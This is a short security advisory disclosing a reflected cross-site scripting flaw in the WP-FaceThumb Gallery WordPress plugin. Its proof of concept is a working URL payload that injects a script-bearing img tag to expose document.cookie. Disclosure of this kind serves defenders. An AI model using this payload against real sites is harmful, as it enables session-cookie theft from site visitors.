###########################################################################################################

 
#  Wordpress WP-FaceThumb Gallery Plugin <= 0.1 Reflected XSS Vulnerability 

#  Plugin Page : http://wordpress.org/extend/plugins/wp-facethumb/ 
 
#  Requires: Wordpress v.3.1 or higher
   
#  Date: 13-05-2012

#  Author : Avram Marius Gabriel (d3v1l)

#  RandomStorm  - http://www.randomstorm.com

#  Tested on: Windows XP & 7 
  
 
############################################################################################################
 

# POC:  


# http://localhost/?page_id=1&pagination_wp_facethumb=1"><img/src=x onerror=alert(document.cookie)>


 
############################################################################################################ 
 
# Description:
 
# This plugin allows your visitor to take a snapshot whith a webcam and the thumb is display on your sidebar. 
# The visitor indicate his pseudo and can let an URL which will be link to the thumb.
 
############################################################################################################